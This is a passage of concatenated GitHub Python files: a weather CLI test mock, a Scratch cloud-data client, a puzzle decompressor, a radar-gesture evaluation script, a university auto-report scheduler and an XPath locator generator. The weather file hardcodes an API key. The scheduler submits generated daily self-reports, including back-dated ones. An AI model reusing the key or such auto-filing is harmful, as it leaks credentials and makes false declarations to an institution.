render(request,'wishindependenceday/index.html',context)","repo_name":"Tahir-Siddique/Web-Technologies-Practice","sub_path":"independence_day/wishindependenceday/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"10204122528","text":"import requests\r\nimport argparse\r\nimport datetime\r\nimport os\r\nfrom pprint import pprint\r\n\r\n#test to see if CI works........................pip\r\ndef mocked_requests_get(*args, **kwargs):\r\n class MockResponse:\r\n def __init__(self, json_data):\r\n self.json_data = json_data\r\n\r\n def json(self):\r\n return self.json_data\r\n\r\n\r\n if (args[0] == \"http://api.openweathermap.org/data/2.5/weather?q=London&units=metric&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n\r\n # London\r\n return MockResponse({\"coord\":{\"lon\":-0.13,\"lat\":51.51},\r\n \"weather\":[{\"id\":500,\"main\":\"Rain\",\"description\":\"light rain\",\"icon\":\"10n\"}],\r\n \"base\":\"stations\",\r\n \"main\":{\"temp\":10.1,\"pressure\":1005,\"humidity\":81,\"temp_min\":7.78,\"temp_max\":12.22},\r\n \"visibility\":10000,\"wind\":{\"speed\":1.5},\"rain\":{\"1h\":0.25},\"clouds\":{\"all\":17},\"dt\":1571187011,\r\n \"sys\":{\"type\":1,\"id\":1414,\"country\":\"GB\",\"sunrise\":1571207117,\"sunset\":1571245602},\r\n \"timezone\":0,\"id\":2643743,\"name\":\"London\",\"cod\":200})\r\n\r\n elif (args[0] == \"http://api.openweathermap.org/data/2.5/weather?id=4379545&units=imperial&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n # California\r\n return MockResponse({\"coord\":{\"lon\":-92.57,\"lat\":38.63},\r\n \"weather\":[{\"id\":801,\"main\":\"Clouds\",\"description\":\"few clouds\",\"icon\":\"02n\"}],\r\n \"base\":\"stations\",\r\n \"main\":{\"temp\":56.55,\"pressure\":1015,\"humidity\":47,\"temp_min\":53.01,\"temp_max\":61},\r\n \"visibility\":16093,\"wind\":{\"speed\":17.22,\"deg\":320,\"gust\":26.4},\"clouds\":{\"all\":20},\"dt\":1571189504,\r\n \"sys\":{\"type\":1,\"id\":3686,\"country\":\"US\",\"sunrise\":1571141942,\"sunset\":1571182368},\r\n \"timezone\":0,\"id\":4379545,\"name\":\"California\",\"cod\":200})\r\n\r\n elif (args[0] == \"http://api.openweathermap.org/data/2.5/weather?lat=35.68&lon=139.76&units=metric&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n # Tokyo\r\n return MockResponse({\"coord\": {\"lon\": 139.76, \"lat\": 35.68},\r\n \"weather\": [{\"id\": 803, \"main\": \"Clouds\", \"description\": \"broken clouds\", \"icon\": \"04d\"}],\r\n \"base\": \"stations\",\r\n \"main\": {\"temp\": 15.48, \"pressure\": 1026, \"humidity\": 72, \"temp_min\": 13.89, \"temp_max\": 17.22},\r\n \"visibility\": 10000, \"wind\": {\"speed\": 3.1, \"deg\": 10}, \"rain\": {}, \"clouds\": {\"all\": 75}, \"dt\": 1571186255,\r\n \"sys\": {\"type\": 1, \"id\": 8077, \"country\": \"JP\", \"sunrise\": 1571172444, \"sunset\": 1571213138},\r\n \"timezone\": 0, \"id\": 1850147, \"name\": \"Tokyo\", \"cod\": 200})\r\n\r\n elif (args[0] == \"http://api.openweathermap.org/data/2.5/weather?zip=3000,AU&units=metric&appid=9faea4c243f8e74d846cc455fbbd810f\"):\r\n # Melbourne\r\n return MockResponse({\"coord\":{\"lon\":144.96,\"lat\":-37.81},\r\n \"weather\":[{\"id\":803,\"main\":\"Clouds\",\"description\":\"broken clouds\",\"icon\":\"04d\"}],\r\n \"base\":\"stations\",\r\n \"main\":{\"temp\":14.97,\"pressure\":1010,\"humidity\":77,\"temp_min\":13.89,\"temp_max\":16.11},\r\n \"visibility\":10000,\"wind\":{\"speed\":4.6,\"deg\":360},\"clouds\":{\"all\":75},\"dt\":1571187042,\r\n \"sys\":{\"type\":1,\"id\":9554,\"country\":\"AU\",\"sunrise\":1571168063,\"sunset\":1571215023},\r\n \"timezone\":0,\"id\":0,\"name\":\"Melbourne\",\"cod\":200})\r\n\r\n print(args[0])\r\n return MockResponse(None)\r\n\r\n\r\n\r\ndef initialiseParser():\r\n # initialise parser for arguments parsing\r\n parser = argparse.ArgumentParser()\r\n\r\n # add compulsory arguments \"-api\"\r\n parser.add_argument(\"-api\", required=True,help=\"enter in following syntax, python openweather.py -api=xxx rest of arguments which will be further explainded\")\r\n\r\n # any location flag is mutually exclusive\r\n location = parser.add_mutually_exclusive_group()\r\n location.add_argument(\"-city\", \"--city\",help=\"Input location with city name add -city=city,countrycode(location can be inputted with one method only)\")\r\n location.add_argument(\"-cid\", \"--cid\",help=\"Input location with city name add -cid=(location can be inputted with one method only)\")\r\n location.add_argument(\"-gc\", \"--gc\", type=str, help=\"Input location with coordinates add -gc=\\\"lat,lon\\\"\")\r\n location.add_argument(\"-z\", \"--z\",help=\"Input location with zip code add -z=zipcode,countrycode(location can be inputted with one method only)\")\r\n\r\n # add optional arguments\r\n parser.add_argument(\"-time\", \"--time\", action='store_true',help=\"displays date and time at which values are being shown\")\r\n parser.add_argument(\"-temp\", \"--temp\", help=\"displays temperature range for current day\")\r\n parser.add_argument(\"-pressure\", \"--pressure\", action='store_true', help=\"displays pressure for current day\")\r\n parser.add_argument(\"-cloud\", \"--cloud\", action='store_true', help=\"displays cloud data for current day\")\r\n parser.add_argument(\"-humidity\", \"--humidity\", action='store_true', help=\"displays humidity for current day\")\r\n parser.add_argument(\"-wind\", \"--wind\", action='store_true', help=\"displays wind data for current day\")\r\n parser.add_argument(\"-sunset\", \"--sunset\", action='store_true', help=\"displays sunrise time for current day\")\r\n parser.add_argument(\"-sunrise\", \"--sunrise\", action='store_true', help=\"displays sunset time for current day\")\r\n parser.add_argument(\"-help\", action='store_true', help=\"displays help menu\")\r\n\r\n return parser.parse_args() # return arguments parsing\r\n\r\n\r\ndef get_city_url(city, api):\r\n # Monash University: Monash,AU\r\n arg_city = str(city)\r\n\r\n url = api + \"q=\" + arg_city\r\n return url\r\n\r\n\r\ndef get_cid_url(cid, api):\r\n # Monash University: 2157247\r\n arg_cid = str(cid)\r\n\r\n url = api + \"id=\" + arg_cid\r\n return url\r\n\r\n\r\ndef get_gc_url(gc, api):\r\n # Monash University -34.23, 140.57\r\n arg_gc = str(gc)\r\n arg_gc = arg_gc.replace(' ', '')\r\n lat, lon = arg_gc.split(',')\r\n\r\n url = api + \"lat=\" + lat + \"&lon=\" + lon\r\n return url\r\n\r\n # valid: python .py -gc -34.23 140.57\r\n\r\n\r\ndef get_z_url(z, api):\r\n # Monash University: 3800,AU\r\n arg_z = str(z)\r\n arg_z = arg_z.replace(' ', '')\r\n zip_code, country_code = arg_z.split(',')\r\n\r\n url = api + \"zip=\" + zip_code + \",\" + country_code\r\n return url\r\n\r\nclass Weather():\r\n def __init__(self, url, api, metric=True):\r\n self.url = url\r\n self.api = api\r\n self.metric = metric\r\n self.data = self.api_fetch()\r\n\r\n def get_time(self):\r\n\r\n # offset to location's current time\r\n timezone_offset = self.data['timezone']\r\n utc_time = datetime.datetime.utcnow() # initialise utc time\r\n\r\n offset = datetime.timedelta(seconds=timezone_offset)\r\n data_time = utc_time + offset\r\n\r\n time_string = data_time.strftime('%Y-%m-%d %H:%M:%S') # format time to year-month-day hour:min:second\r\n\r\n # concatenate readable syntax and return string\r\n time_string = \"On {}. \".format(time_string)\r\n\r\n return time_string\r\n\r\n\r\n def get_temp(self):\r\n\r\n # api return temperature string in fahrenheit or celsius(default)\r\n temp_min = self.data['main']['temp_min']\r\n temp_max = self.data['main']['temp_max']\r\n\r\n # concatenate readable syntax\r\n temp_string = \"The temperature ranges from {}-{}\".format(temp_min, temp_max)\r\n\r\n # concatenate units\r\n if self.metric is False:\r\n temp_string += \" fahrenheit. \"\r\n else:\r\n temp_string += \" celsius. \"\r\n\r\n return temp_string\r\n\r\n\r\n def get_humidity(self):\r\n\r\n # api return humidity string in % and description string\r\n humidity = self.data['main']['humidity']\r\n description = self.data['weather'][0]['description']\r\n\r\n # concatenate readable syntax, units and return string\r\n humidity_string = \"Weather conditions are likely {} with humidity of {}%. \".format(description, humidity)\r\n return humidity_string\r\n\r\n\r\n def get_cloud(self):\r\n\r\n # api return clouds string in %\r\n cloud = self.data['clouds']['all']\r\n\r\n # concatenate readable syntax, units and return string\r\n cloud_string = \"The percentage of clouds is {}%. \".format((cloud))\r\n return cloud_string\r\n\r\n\r\n def get_wind(self):\r\n\r\n data = self.api_fetch(self.url)\r\n\r\n # api return windspeed string in miles/sec or meters/sec(default) and wind degrees string in degrees\r\n wind_speed = data['wind']['speed']\r\n wind_degrees = data['wind']['deg']\r\n\r\n wind_string = \"The wind speed is {} meters/sec from {} degrees. \".format(str(wind_speed), str(wind_degrees))\r\n\r\n # concatenate readable syntax, units and return string\r\n return wind_string\r\n\r\n\r\n def get_pressure(self):\r\n\r\n # api return pressure string in hPa\r\n pressure = self.data['main']['pressure']\r\n\r\n # concatenate readable syntax, units and return string\r\n pressure_string = \"The pressure is {} hPa. \".format(pressure)\r\n return pressure_string\r\n\r\n\r\n def get_sunrise(self):\r\n unix_utc = self.data['sys']['sunrise'] # api response in unix utc\r\n utc_sunrise_time = datetime.datetime.utcfromtimestamp(unix_utc) # convert from unix utc to current utc time\r\n\r\n # offset to location's current time\r\n timezone_offset = self.data['timezone']\r\n offset = datetime.timedelta(seconds=timezone_offset)\r\n local_sunrise_time = utc_sunrise_time + offset\r\n\r\n sunrise_string = local_sunrise_time.strftime('%H:%M:%S') # format time to hour:min:second\r\n\r\n # concatenate readable syntax and return string\r\n sunrise_string = \"Sunrise time is at {}. \".format(sunrise_string)\r\n return sunrise_string\r\n\r\n\r\n def get_sunset(self):\r\n unix_utc = self.data['sys']['sunset'] # api response in unix utc\r\n utc_sunset_time = datetime.datetime.utcfromtimestamp(unix_utc) # convert from unix utc to current utc time\r\n\r\n # offset to location's current time\r\n timezone_offset = self.data['timezone']\r\n offset = datetime.timedelta(seconds=timezone_offset)\r\n local_sunset_time = utc_sunset_time + offset\r\n\r\n sunset_string = local_sunset_time.strftime('%H:%M:%S') # format time to hour:min:second\r\n\r\n # concatenate readable syntax and return string\r\n sunset_string = \"Sunset time is at {}. \".format(sunset_string)\r\n return sunset_string\r\n\r\n\r\n def api_fetch(self):\r\n # add units\r\n if self.metric is False:\r\n url = self.url + \"&units=imperial\"\r\n else:\r\n url = self.url + \"&units=metric\"\r\n\r\n api = \"&appid=\" + self.api # concatnate provided api key to comply with api call format\r\n url += api # append api key to url for api call\r\n response = requests.get(url) # api call\r\n data = response.json() # api response\r\n # pprint(data)\r\n\r\n return data\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\r\n # initialise arguments parsing\r\n args = initialiseParser()\r\n api = \"http://api.openweathermap.org/data/2.5/weather?\" # initialise api url for api call\r\n\r\n # invoke help menu and exit program without any error code\r\n if args.help:\r\n os.system(\"python3 \" + __file__ + \" --help\")\r\n exit()\r\n\r\n if args.city:\r\n url = get_city_url(args.city, api)\r\n\r\n elif args.cid:\r\n url = get_cid_url(args.cid, api)\r\n\r\n elif args.gc:\r\n url = get_gc_url(args.gc, api)\r\n\r\n elif args.z:\r\n url = get_z_url(args.z, api)\r\n\r\n else:\r\n # Case whereby user does not provide any location argument, exit with error code 1\r\n print(\"User must enter a location using either -city, -cid, -gc or -z\")\r\n exit(1)\r\n\r\n if args.temp == \"fahrenheit\":\r\n weather_object = Weather(url, args.api, False)\r\n else:\r\n weather_object = Weather(url, args.api)\r\n status_code = weather_object.data['cod']\r\n\r\n\r\n if (status_code == 200):\r\n r_string = \"\" # intialise return string\r\n\r\n if (args.humidity == False and args.pressure == False and args.temp == None and args.wind == False and\r\n args.cloud == False and args.sunrise == False and args.sunset == False and args.time == False):\r\n\r\n print(\"Enter a weather parameter\")\r\n exit(2)\r\n\r\n if args.time:\r\n r_string += weather_object.get_time()\r\n\r\n if args.temp:\r\n r_string += weather_object.get_temp()\r\n\r\n if args.humidity:\r\n r_string += weather_object.get_humidity()\r\n\r\n if args.cloud:\r\n r_string += weather_object.get_cloud()\r\n\r\n if args.wind:\r\n r_string += weather_object.get_wind()\r\n\r\n if args.pressure:\r\n r_string += weather_object.get_pressure()\r\n\r\n if args.sunrise:\r\n r_string += weather_object.get_sunrise()\r\n\r\n if args.sunset:\r\n r_string += weather_object.get_sunset()\r\n\r\n # print result string\r\n print(r_string)\r\n\r\n else:\r\n # print error message with error code\r\n print(\"Error: {}\".format(status_code))\r\n exit(int(status_code))\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"sanaa-sys/OpenWeather-API","sub_path":"openweather.py","file_name":"openweather.py","file_ext":"py","file_size_in_byte":13523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"27274545110","text":"try:\n import websocket #upm package(websocket-client)\nexcept ImportError:\n import os\n os.system(\"pip install websocket-client\")\nimport json\nimport requests\nfrom . import API_ERRORS\n\nclass cloud:\n def __init__(self, info, project_id):\n self.info = info\n self.project_id = str(project_id)\n self.ready = False\n \n def Open(self):\n self.ws = websocket.WebSocket()\n self.connect()\n\n self.ready = True\n def connect(self):\n self.ws.connect(\"wss://clouddata.scratch.mit.edu\", cookie=f\"scratchsessionsid={self.info['sessid']};\", orgin=\"https://scratch.mit.edu\", enable_multithread=True)\n\n self.ws.send(f\"{json.dumps({'method': 'handshake', 'user': self.info['usr'], 'project_id': self.project_id})}\\n\")\n\n def setVar(self, var, val):\n var = f\"☁ {str(var)}\"\n if self.ready:\n try:\n self.ws.send(f\"{json.dumps({'method': 'set', 'name': var, 'value': str(val), 'user': self.info['usr'], 'project_id': self.project_id})}\\n\")\n except BrokenPipeError:\n self.connect()\n self.ws.send(f\"{json.dumps({'method': 'set', 'name': var, 'value': str(val), 'user': self.info['usr'], 'project_id': self.project_id})}\\n\")\n else:\n raise API_ERRORS.NotReady(\"Connection not open try obj.Open()!\")\n \n def varExists(self, var):\n if self.getVar(var) != None:\n return True\n else:\n return False\n\n def getVar(self, var):\n \n res = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={self.project_id}&limit=1567&offset=0\")\n while res.status_code == 502:\n res = requests.get(f\"https://clouddata.scratch.mit.edu/logs?projectid={self.project_id}&limit=1567&offset=0\")\n\n res = res.json()\n var = f\"☁ {str(var)}\"\n for i in res:\n if var == i[\"name\"]:\n return i[\"value\"]\n \n def close(self):\n self.ws.close()\n\n def encodeData(self, data : str):\n string = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-+=[]{}\\\\\\\"'/?.,<>:\"\n encoded = \"\"\n\n for i in data:\n if i in string:\n index = string.find(i)\n if index < 10:\n index = \"0\" + str(index)\n encoded += str(index)\n \n return encoded\n \n def decodeData(self, data : str):\n string = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890!@#$%^&*()_-+=[]{}\\\"'/?.,<>:\"\n decoded = \"\"\n\n for i in range(0, len(data), 2):\n current_num = data[i] + data[i + 1]\n current_num = int(current_num)\n\n decoded += string[current_num]\n \n return decoded\n","repo_name":"Ancoder2009/static.cdn.ancoder.ml","sub_path":"scratch_api_py/cloud.py","file_name":"cloud.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"73201312681","text":"import zlib, bz2, time\n\nwith open(\"package.pack\", \"rb\") as f:\n data = f.read()\n print(data[:10])\n rs = ''\n while True:\n # print(\"run\", data[:10], \"~~\", data[-10:])\n # time.sleep(1)\n if data.startswith(b'x\\x9c'):\n print(\"startswith : \", data[:5], \"~\", data[-5:])\n data = zlib.decompress(data)\n rs += '#';\n elif data.startswith(b'BZh'): \n print(\"startswith : \", data[:5], \"~\", data[-5:])\n data = bz2.decompress(data)\n rs += ' ';\n elif data.endswith(b'\\x9cx'):\n print(\"endswith : \", data[:5], \"~\", data[-5:])\n data = data[::-1]\n rs += '\\n';\n else:\n print(data)\n break\n print(data)\n print(rs)\n\n\n# with open(\"level20.zip\", 'rb') as f:\n# data = f.read()\n# time.sleep(1)\n # print(data[:5], \"~~\", data[-5:])","repo_name":"Fhwang0926/study.wargame.python-challenge","sub_path":"21/21.py","file_name":"21.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"31562580040","text":"import numpy as np\nimport xlsxwriter\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import axes3d\nfrom tensorflow import keras\nfrom matplotlib import gridspec\n\nworkbook = xlsxwriter.Workbook('write_data.xlsx')\nworksheet = workbook.add_worksheet()\n\ndef show_trace(cam,out,title):\n\n print(np.shape(cam))\n print(np.shape(out))\n cam = cam/0.015\n out = out/0.015\n mark = \",\"\n size = 1\n fig = plt.figure()\n spec = gridspec.GridSpec(ncols=2, nrows=1)\n ax0 = fig.add_subplot(spec[0])\n\n ax0.set_title('X-Y plane', color='black')\n ax0.scatter(cam[:, 0], cam[:, 1],s=size, marker=mark)\n ax0.plot(cam[:, 0], cam[:, 1])\n ax0.scatter(out[:, 0], out[:, 1], s=size, marker=mark)\n ax0.plot(out[:, 0], out[:, 1])\n # ax0.set_xlim(-10, 10)\n # ax0.set_ylim(-10, 10)\n ax0.set_xlabel(\"x(cm)\")\n ax0.set_ylabel(\"y(cm)\")\n ax0.set_aspect(1)\n ax0.legend()\n\n ax1 = fig.add_subplot(spec[1])\n ax1.scatter(cam[:, 0], cam[:, 2],s=size, marker=mark)\n ax1.plot(cam[:, 0], cam[:, 2])\n ax1.scatter(out[:, 0], out[:, 2],s=size, marker=mark)\n ax1.plot(out[:, 0], out[:, 2])\n # ax1.set_xlim(-10, 10)\n # ax1.set_ylim(-10, 10)\n ax1.set_xlabel(\"x(cm)\")\n ax1.set_ylabel(\"z(cm)\")\n ax1.set_aspect(1)\n ax1.set_title('X-Z plane', color='black')\n ax1.legend()\n fig.tight_layout()\n plt.suptitle(title)\n plt.show()\n # plt.savefig(path+\"Trace(t2+t3)timestep12.png\")\n # plt.close()\n\ndef mean_square_error( x, y, title):\n cc = 0\n errorx = 0\n errory = 0\n errorz = 0\n stdx = []\n stdy = []\n stdz = []\n for i in range(len(x)):\n if y[i,0]== 0 and y[i,1]== 0 and y[i,2]== 0:\n pass\n else:\n errorx += (((x[i, 0] - y[i, 0])/0.015)**2)\n errory += (((x[i, 1] - y[i, 1])/0.015)**2)\n errorz += (((x[i, 2] - y[i, 2])/0.015)**2)\n stdx.append((x[i, 0]- y[i, 0])/0.015)\n stdy.append((x[i, 1]- y[i, 1])/0.015)\n stdz.append((x[i, 2]- y[i, 2])/0.015)\n cc +=1\n # std_x = np.sqrt(sum(stdx - np.mean(stdx)))\n # std_y = np.sqrt(sum(stdy - np.mean(stdy)))\n # std_z = np.sqrt(sum(stdz - np.mean(stdz)))\n std_x = np.std(stdx)\n std_y = np.std(stdy)\n std_z = np.std(stdz)\n print(\"\\n----- {} -----\".format(title))\n print(\"std x:{} y:{} z:{}\".format(np.round(std_x,3),np.round(std_y,3),np.round(std_z,3)))\n print(\"MSE error x:{} y:{} z:{}\".format(np.round(errorx/cc,3),np.round(errory/cc,3),np.round(errorz/cc,3)))\n errorxy = (errorx / cc + errory / cc)/2\n stdxy = (std_x + std_y )/2\n errorxz = (errorx / cc + errorz / cc) / 2\n stdxz = (std_x + std_z) / 2\n\n print(\"XY mse:{} std:{}\" .format(np.round(errorxy,3),np.round(stdxy,3)))\n print(\"XZ mse:{} std:{}\".format(np.round(errorxz,3),np.round(stdxz,3)))\n\n return errorx/cc, errory/cc, errorz/cc, std_x, std_y, std_z\n\n# Gesture = [\"circle\"]\n# Gesture = [\"circle\", \"eight\", \"rectangle\", \"up\", \"down\", \"left\", \"right\"]\nGesture = [\"circle\", \"down\"]\nhead_path = 'C:/Users/user/Desktop/thmouse_training_data/'\ntime = 0\nfor i in Gesture:\n for j in range(2, 3):\n tmp_path = head_path + i + \"/time\" + str(j) + \"/\"\n title = i + \" of /time\" + str(j) + \" /light_nonesliding_larrysrc_timestep12\"\n path = tmp_path\n out_cam_p = np.load(path + 'out_cam_p.npy', allow_pickle=True)\n radar = np.load(path + 'out_radar_p_larry.npy', allow_pickle=True)\n # radar = np.load(path + 'out_radar_p.npy', allow_pickle=True)\n out_radar_p = np.load(path + 'out_center_p.npy', allow_pickle=True)\n start_len = 128\n end_len = 140\n out_cam_p = out_cam_p[start_len:end_len,:,8]\n out_radar_p = out_radar_p[start_len:end_len]\n # radar = np.reshape(radar[start_len:end_len],[-1,20,1,25,25,25])\n # radar = np.reshape(radar[start_len:end_len],[-1,12,1,25,25,25])\n # radar = np.reshape(radar[start_len:end_len],[-1,4,1,25,25,25])\n radar = np.reshape(radar[start_len:end_len],[-1,3,1,25,25,25])\n # radar = np.reshape(radar[20:140],[-1,3,1,25,25,25])\n # x, y, z, stdx, stdy, stdz =mean_square_error(out_cam_p, out_radar_p,title)\n # show_error(out_cam_p, out_radar_p, x, y, z, stdx, stdy, stdz, title, tmp_path)\n\n model = keras.models.load_model(\"D:\\\\pythonProject\\\\ML_thumouse\\\\New_model_adam\\\\light_nonesliding_larrysrc_timestep12.h5\")\n\n out = model.predict(radar)\n out = np.reshape(out,[-1,3])\n # tmp_outcamp = out_cam_p[3::4]\n show_trace(out_cam_p,out,title)\n mean_square_error(out_cam_p,out,\"\")\n\n\n## single test\n\n\n# tmp_path = 'C:/Users/user/Desktop/thmouse_training_data/'\n#\n# path = tmp_path\n# out_cam_p = np.load(path + 'out_cam_p.npy', allow_pickle=True)\n# radar = np.load(path + 'out_radar_p.npy', allow_pickle=True)\n# out_radar_p = np.load(path + 'out_center_p.npy', allow_pickle=True)\n# start_len = 0\n# end_len =40\n# out_cam_p = out_cam_p[start_len:end_len,:,8]\n# out_radar_p = out_radar_p[start_len:end_len]\n# # radar = np.reshape(radar[20:140],[-1,12,1,25,25,25])\n# radar = np.reshape(radar[start_len:end_len],[-1,4,1,25,25,25])\n# # radar = np.reshape(radar[20:140],[-1,3,1,25,25,25])\n# # x, y, z, stdx, stdy, stdz =mean_square_error(out_cam_p, out_radar_p,title)\n# # show_error(out_cam_p, out_radar_p, x, y, z, stdx, stdy, stdz, title, tmp_path)\n#\n# model = keras.models.load_model(\"D:\\\\pythonProject\\\\ML_thumouse\\\\t2t3新方法.h5\")\n# out = model.predict(radar)\n# out = np.reshape(out,[-1,3])\n#\n# tmp_outcamp = out_cam_p[4::4]\n# show_trace(tmp_outcamp,out)","repo_name":"t109368038/ML_thumouse","sub_path":"code_val_reslut/traceline.py","file_name":"traceline.py","file_ext":"py","file_size_in_byte":5584,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"74417139881","text":"import sys\nimport os\nroot_path = os.path.dirname(os.path.abspath(__file__))\nsrc_path = os.path.join(root_path,\"src\")\nsys.path.extend([root_path, src_path])\n\nimport datetime\nimport logging\nimport os\nimport time\nimport traceback\nimport ast\nfrom apscheduler.schedulers.blocking import BlockingScheduler\nfrom apscheduler.events import EVENT_JOB_EXECUTED, EVENT_JOB_ERROR\n\nfrom login.login import Loginer\nfrom report.report import Reporter\nfrom fstate.generator import FstateGenerator\nfrom mail.send_email import Emailer\n\nfrom config import config\n\ncur_dir_path = os.path.dirname(os.path.abspath(__file__))\n\n\n\n# 配置日志显示\nlogging.basicConfig(level=logging.INFO,\n format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s %(message)s',\n datefmt='%Y-%m-%d %H:%M:%S',\n filename=os.path.join(cur_dir_path,\"log\",\"report.log\"),\n filemode='a')\n\n\n\nclass Launcher:\n\n REPORT_TIMEOUT = 45 # 报送时间间隔\n ADMIN_EMAIL = config['email']['admin']\n \n def __init__(self) -> None:\n self.loginer = Loginer() # 登录器\n self.reporter = Reporter() # 报送器\n self.fstate_generator = FstateGenerator() # fstate生成器\n self.emailer = Emailer() # 邮件发送器\n\n\n def autoreport(self, user_info: dict, date: datetime):\n \"\"\"按传入的日期进行报送\n Args:\n user_info (dict): 用户信息\n date (datetime): 日期\n \"\"\"\n try:\n session = self.loginer.login(user_info['username'], user_info['password'])\n fstate = self.fstate_generator.generate_fstate(date, user_info)\n report_result = self.reporter.report(session, date, user_info, fstate)\n if report_result:\n return report_result\n except:\n logging.info(f\"AutoReport fail\")\n logging.info(traceback.format_exc())\n\n @staticmethod\n def str_to_datetime(date_str: str):\n if date_str:\n return datetime.datetime.strptime(date_str, \"%Y-%m-%d\")\n return \n\n def history_report(self,user_info: dict,today:datetime):\n history_date = self.str_to_datetime(user_info['history_report_begin_date'])\n if history_date and history_date <= today:\n logging.info(f\"begin history report from:{history_date}\")\n while history_date <= today:\n report_result = self.autoreport(user_info, history_date)\n if report_result:\n if ast.literal_eval(user_info[\"success_email\"]):\n self.emailer.send_email(history_date, user_info['email_address'], user_info['email_type'])\n else:\n self.emailer.send_email(today, self.ADMIN_EMAIL, email_type=user_info['email_type'], identity=\"admin\", user_id=user_info['username'])\n time.sleep(self.REPORT_TIMEOUT)\n history_date = history_date + datetime.timedelta(days=1)\n\n def today_report(self,user_info: dict,today:datetime):\n report_result = self.autoreport(user_info, today)\n if report_result:\n if ast.literal_eval(user_info[\"success_email\"]):\n self.emailer.send_email(today, user_info['email_address'], email_type=user_info['email_type'])\n else:\n self.emailer.send_email(today, self.ADMIN_EMAIL, email_type=user_info['email_type'], identity=\"admin\", user_id=user_info['username'])\n\n def main(self):\n try:\n today = datetime.datetime.today()\n for key, user_info in config.items():\n # 判断用户\n if \"user\" in key:\n # 历史报送\n self.history_report(user_info,today)\n # 今日报送\n self.today_report(user_info,today)\n time.sleep(self.REPORT_TIMEOUT)\n except:\n self.emailer.send_email(today, self.ADMIN_EMAIL, email_type=user_info['email_type'], identity=\"admin\")\n logging.info(f\"Report fail\")\n logging.info(traceback.format_exc())\n\ndef crontab_listener(event):\n if event.exception:\n logging.error('autoreport failed!!!')\n else:\n logging.info('autoreport success...')\n\nif __name__ == \"__main__\":\n scheduler = BlockingScheduler()\n launcher = Launcher()\n # launcher.main()\n scheduler.add_job(func=launcher.main, trigger='cron', hour=6, minute=50, id='cron_task')\n\n # 配置任务执行完成和执行错误的监听\n scheduler.add_listener(crontab_listener, EVENT_JOB_EXECUTED | EVENT_JOB_ERROR)\n\n # 设置日志\n scheduler._logger = logging\n\n scheduler.start()\n","repo_name":"FomalHauts/SHU-SelfReport","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4751,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"18"} +{"seq_id":"71182519400","text":"# Daniel Ryaboshapka and Sam Chung \n# Robula+ Implementation in Python 3.7 \n# Instead of Robula+, its Robula- \n\nfrom bs4 import BeautifulSoup \nfrom lxml import html, etree \nimport re \nfrom absolute_xpath import getAbsXpaths\nfrom timeout import TimeoutError\n\nGLOBAL_TIMEOUT = 0\n\n#########################################################################\n### NAME DEFINITIONS ###\n### ###\n### xp = The XPATH expression to specialize --> //td ###\n### N = The length (in nodes/levels) of variable xp ###\n### |--> //td => N=1 ###\n###\t\t\t\t\t\t//*//td => N=2 ### \n### L = The list of the ancestors of target elem e in the ### \n### considered DOM, starting and including e ###\n### ###\n#########################################################################\n\n#########################################################################\n### TRANFORMATIONS ###\n### ###\n#########################################################################\n\n\n# Precondition: Xpath xp starts with //* \n# Action: replace initial * with tag name of the DOM elem L.get(N)\n# Example: INPUT: xp = //*/td and L.get(2).getTagName() = tr \n#\t\t\t\tOUTPUT: //tr//td\ndef transfConvertStar(xp, tagname):\n if xp.startswith('//*'):\n xp = xp.replace('*',tagname)\n return xp \n\n# Precondition: the Nth level of xp does not contain already any kind of predicates \n# Action: for each available attribute-value pair of the DOM element L.get(N), generate a \n#\t\t\t\tcandidate locator by adding a predicate based on such value \n#\t\t\t\tto the higher level of xp\n# Example: INPUT: xp = //tr/td & L.get(2).getAttributes() = {name: 'data', class: 'table-row'}\n#\t\t\t\tOUTPUT: //tr[@name='data']/td & //tr[@class='table-row']/td\n# TODO: Maybe make attribute parsing a function? Esp with blacklist involved...\ndef transfAddAttribute(xp, attributes, tagname, blacklist_tags):\n temp = xp.replace(\"//\", \"\")\n elements = temp.split(\"/\")\n target = elements[0]\n xpaths = []\n if \"[@\" in target: \n xpaths.append('//' + target + xp[(2+len(target)):])\n return xpaths\n attrstrings = [] \n seen_keys = []\n if attributes != []: \n for key in attributes: \n if key not in blacklist_tags and key not in seen_keys:\n if type(attributes[key]) == list:\n if key == \"class\": \n full_attribute = \"\"\n for item in attributes[key]:\n full_attribute += item + \" \"\n full_attribute = full_attribute[:-1]\n attrstrings.append(\"[@\" + key + \"=\\\"\" + full_attribute + \"\\\"]\")\n else:\n attrstrings.append(\"[@\" + key + \"=\\\"\" + attributes[key][0] + \"\\\"]\")\n else: \n attrstrings.append(\"[@\" + key + \"=\\\"\" + attributes[key] + \"\\\"]\")\n seen_keys.append(key)\n for attr in attrstrings: \n xpaths.append('//' + target + attr + xp[(2+len(target)):])\n return xpaths\n\n# Precondition: the Nth level of xp does not contain already any predicate on position\n# Action: add the position of the element L.get(N) to the higher level of xp \n# Example: INPUT: xp = //tr/td and L.get(2).getPosition() = {if tag-name=2, if '*'=3}\n#\t\t\t\tOUTPUT: //tr[2]/td\ndef transfRemovePosition(tagname):\n pattern = re.compile(r'(\\[[\\d]*)')\n match = pattern.findall(tagname)\n fixed = 